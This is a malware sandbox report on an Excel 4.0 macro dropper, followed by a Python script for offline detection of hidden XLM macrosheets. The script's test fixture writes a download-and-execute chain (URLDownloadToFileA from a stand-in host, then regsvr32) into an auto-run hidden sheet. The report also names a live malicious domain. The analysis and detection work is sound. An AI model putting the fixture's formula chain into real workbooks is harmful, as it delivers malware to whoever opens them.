Joe Sandbox analysis report (flattened export; field labels reconstructed where the value makes them unambiguous)

Joe Sandbox version: 31.0.0 Emerald
Unlabelled field: IR
Analysis ID: 382991
Product: CloudBasic
Start time: 02:09:00
Start date: 07/04/2021
Sample file name: Documents (252).xlsm
Cookbook: defaultwindowsofficecookbook.jbs
Analysis system: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Platform: WINDOWS
Sample MD5: 966c13f10fa0b3bfe75da87bca817396
Sample SHA1: 1769db2ec1d019b526e63637a413ceab10d00ff3
Sample SHA256: 963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
File type (TrID): Excel Microsoft Office Open XML Format document (40004/1) 83.32%

Unlabelled flag and score fields, in source order (their column headers did not survive extraction):
true, false, false, false, 96, 0, 100, 5, 0, 5, false
Dropped files (each source record was path, an unlabelled boolean flag, MD5, SHA1, SHA256; several Content.MSO cache entries and the two 8-hex-digit temp files are byte-identical copies, as the repeated hashes show):

Path | Flag | MD5 | SHA1 | SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\842F6688.png | false | 600F503BC1066BEB5FB5DD494AA1CD74 | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C8A64E9.png | false | 29A9EE6FB5591751FC60ECD0FDB9478D | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ABD84DE3.png | false | 55E8A29B221E51BE421B7D4F5F5F7E52 | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C16FFF7C.png | false | 29A9EE6FB5591751FC60ECD0FDB9478D | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0A1E1A7.png | false | 600F503BC1066BEB5FB5DD494AA1CD74 | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F763B4BE.png | false | 55E8A29B221E51BE421B7D4F5F5F7E52 | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
C:\Users\user\AppData\Local\Temp\D2CE0000 | false | BD358272AF7DAB33151195FF12D6217E | CCC193B27AA91319B42770E4B668FAF7A7929DB6 | 08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK | false | 835340709C9BFF9A87235BAEB59683B1 | 0754C627E8564659FE9FB5373FDC2F130EE5CB5E | 0368C23B6D83D9BCEC16378A4E104A8CC2AFD0DA0CF5CFC78751943FC89C133D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents (252).LNK | false | B2ACE93FE976A321BFC3FD8E59A2B6A6 | 93F2EB6AC0E1675C80834266AEB0FE694415CB66 | 22FEDE4E594CE2465437BAA9E7604556671CE3F8C4AC95C1B9272072A9543952
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat | false | EBF0A100F3CDA68735AABF46F42CEFEF | 48CA8B0E2DD6FE5737EFA9DAA2F9BB055B72F9E0 | F86272101EB9CA0D4BB98DE814ADAAB3FF2891930B18A20BDDD8CDE3B55AF55B
C:\Users\user\Desktop\A3CE0000 | false | BD358272AF7DAB33151195FF12D6217E | CCC193B27AA91319B42770E4B668FAF7A7929DB6 | 08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012
C:\Users\user\Desktop\~$Documents (252).xlsm | true | 98D7F9B901C91608CD7EA5509662BBCA | F166635CE572B615A1D80076A1AE8DE9220473CF | F07A8B18E5B50003C42020241E82DDCCFBE254236AF2678C3CEFA4709100F4FE
Network indicators:
IP: 192.168.2.255 (if the analysis guest sits on 192.168.2.0/24, this is that subnet's broadcast address, i.e. local noise rather than an external host the document contacted)
Domain: xherzog24pv.xyz (unlabelled fields in source order: true, unknown)
Signatures (behavioural and static detections, in source order):
Contains functionality to create processes via WMI
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office document connecting to suspicious TLD
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Potential document exploit detected (performs DNS queries with low reputation score)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Wmic Launch regsvr32
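The two static signatures above ("Found Excel 4.0 Macro with suspicious formulas" and "Found abnormal large hidden Excel 4.0 Macro sheet") can be reproduced on any .xlsm without a sandbox, because Excel 4.0 (XLM) macros live as plain XML parts under xl/macrosheets/ in the OOXML zip, and sheet visibility (hidden / veryHidden) is declared in xl/workbook.xml. The script below is an added example written for this page, not Joe Sandbox code and not derived from "Documents (252).xlsm": it unzips the container, follows the workbook relationships to each macrosheet part, reports Auto_Open-style defined names, and flags formulas that call CALL/EXEC/REGISTER and similar. The sample workbook it builds is constructed for the example; the 1000-cell "large sheet" threshold is an assumption for this example, not a documented Joe Sandbox value. It goes slightly beyond the report by also checking auto-exec names, which is how a hidden macrosheet gets to run at all.

```python
"""Offline triage of Excel 4.0 (XLM) macro sheets inside an .xlsm container.

Added example for this page, not Joe Sandbox code. The workbook built by
build_sample() is constructed test data, NOT the sample from the report.
"""
import io
import re
import zipfile
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
# XLM functions that give a macro sheet process execution, DLL calls or downloads.
SUSPICIOUS_RE = re.compile(r"\b(CALL|EXEC|REGISTER|RUN|FORMULA|SHELL|URLDOWNLOADTOFILE)\s*\(", re.I)
LARGE_SHEET_CELLS = 1000  # assumption for this example: what counts as "abnormally large"


def _local(tag):
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def triage_xlm(data):
    """Inspect .xlsm bytes; return macro sheets, auto-exec names, suspicious formulas."""
    out = {"macrosheets": [], "autoexec": [], "suspicious": [], "hidden_large": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "xl/workbook.xml" not in names:
            return out
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        # rId -> part name, so we know which <sheet> entries point at macrosheets.
        rels = {}
        if "xl/_rels/workbook.xml.rels" in names:
            for r in ET.fromstring(z.read("xl/_rels/workbook.xml.rels")).iter():
                if _local(r.tag) == "Relationship":
                    t = r.get("Target", "")
                    rels[r.get("Id")] = t.lstrip("/") if t.startswith("/") else "xl/" + t
        # Auto_Open / Auto_Close names make an XLM sheet run as soon as the workbook opens.
        for dn in wb.iter():
            if _local(dn.tag) == "definedName" and re.match(r"(_xlnm\.)?auto_", dn.get("name", ""), re.I):
                out["autoexec"].append((dn.get("name"), (dn.text or "").strip()))
        for sh in wb.iter():
            if _local(sh.tag) != "sheet":
                continue
            part = rels.get(sh.get("{%s}id" % R_NS), "")
            if not part.startswith("xl/macrosheets/") or part not in names:
                continue  # ordinary worksheet, or dangling relationship
            root = ET.fromstring(z.read(part))
            name, state = sh.get("name"), sh.get("state", "visible")
            ncells = 0
            for c in root.iter():
                if _local(c.tag) != "c":
                    continue
                ncells += 1
                for f in c:  # <f> holds the formula text without the leading "="
                    if _local(f.tag) == "f" and SUSPICIOUS_RE.search(f.text or ""):
                        out["suspicious"].append((name, c.get("r"), f.text))
            out["macrosheets"].append((name, state, ncells))
            if state in ("hidden", "veryHidden") and ncells >= LARGE_SHEET_CELLS:
                out["hidden_large"].append(name)
    return out


def build_sample(cells=1200):
    """Construct a minimal .xlsm (example data only) with one veryHidden XLM sheet."""
    formulas = [
        'CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/p.dll","C:\\Users\\Public\\p.dll",0,0)',
        'EXEC("regsvr32 /s C:\\Users\\Public\\p.dll")',
        'HALT()',
    ] + ['CHAR(65)'] * (cells - 3)  # padding so the sheet crosses the size threshold
    rows = "".join('<row r="%d"><c r="A%d"><f>%s</f></c></row>' % (i, i, escape(f))
                   for i, f in enumerate(formulas, 1))
    main = 'xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"'
    parts = {
        "xl/workbook.xml": '<workbook %s xmlns:r="%s"><sheets>'
            '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
            '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets>'
            '<definedNames><definedName name="Auto_Open">Macro1!$A$1</definedName></definedNames>'
            '</workbook>' % (main, R_NS),
        "xl/_rels/workbook.xml.rels":
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
            '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/>'
            '</Relationships>',
        "xl/worksheets/sheet1.xml": '<worksheet %s><sheetData/></worksheet>' % main,
        "xl/macrosheets/sheet1.xml":
            '<xm:macrosheet xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" %s>'
            '<sheetData>%s</sheetData></xm:macrosheet>' % (main, rows),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for n, xml in parts.items():
            z.writestr(n, xml)
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(triage_xlm(build_sample()), indent=2))
```

Run it against a real file with `triage_xlm(open(path, "rb").read())`. The relationship lookup matters: a `<sheet>` entry in workbook.xml looks the same whether it is a worksheet or a macrosheet, so the only reliable way to tell is the relationship type and target under xl/_rels/. Formula text is matched after the XML layer, so the usual string-splitting obfuscation inside a single cell still shows up as CALL/EXEC; chains built with FORMULA() across many cells are caught only because FORMULA itself is on the list.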